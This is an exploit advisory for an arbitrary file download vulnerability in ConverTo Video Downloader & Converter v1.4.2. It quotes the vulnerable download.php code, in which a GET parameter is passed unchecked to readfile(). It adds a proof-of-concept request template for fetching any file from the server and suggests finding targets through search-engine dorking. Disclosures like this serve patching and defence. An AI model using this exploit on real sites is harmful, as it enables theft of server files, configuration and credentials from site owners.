ConverTo Video Downloader And Converter 1.4.2 File Download

====================================================================================================================================| # Title     : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : https://codecanyon.net/item/converto-video-downloader-converter/13225966                                           |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file :download.php [+] line 12 readfile ($file);  & line 5 $file = urldecode($_GET['f']);<?php if(isset($_GET['f'])){  $siz = convertToBytes($_GET['sz']);$file = urldecode($_GET['f']);$rand = rand(0,5000);header("Content-Description: File Transfer"); header("Content-Type: application/octet-stream"); header('Content-Length: ' . $siz);header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");  ob_clean(); flush();readfile ($file); }[+] http://localhost/[PATH]/download.php?f= Ev!lGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================